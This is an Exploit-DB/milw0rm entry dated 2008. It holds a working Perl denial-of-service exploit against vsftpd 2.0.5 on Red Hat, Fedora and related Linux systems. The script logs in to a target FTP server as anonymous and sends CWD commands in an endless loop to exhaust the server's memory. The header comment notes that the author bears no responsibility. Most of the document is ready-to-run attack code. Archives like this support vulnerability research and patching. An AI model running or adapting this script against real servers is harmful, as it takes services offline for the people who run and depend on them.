vsftpd 2.0.5 CWD Remote Memory Consumption Exploit post auth

2008-06-14T00:00:00
ID EDB-ID:5814
Type exploitdb
Reporter Praveen Darshanam
Modified 2008-06-14T00:00:00

Description

vsftpd 2.0.5 (CWD) Remote Memory Consumption Exploit (post auth). Dos exploit for linux platform

                                        
                                            #!/usr/bin/perl -w


#######################################################################################
#		vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,
#		Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.
#
#		Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration
#		option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed.
#
#		I tried to modify local exploit found at securityfocus such that we can remotely exloit
#
# 		Author shall not bear any responsibility
#		Author:	Praveen Darshanam
#		Email:	praveen[underscore]recker[at]sify.com
#		Date:	07th June, 2008
#
#
########################################################################################


use Net::FTP;
$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n";
$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry";

while(1)
{
#this loop runs infinitely

$ftp -> cwd();
}

$ftp->quit;

# milw0rm.com [2008-06-14]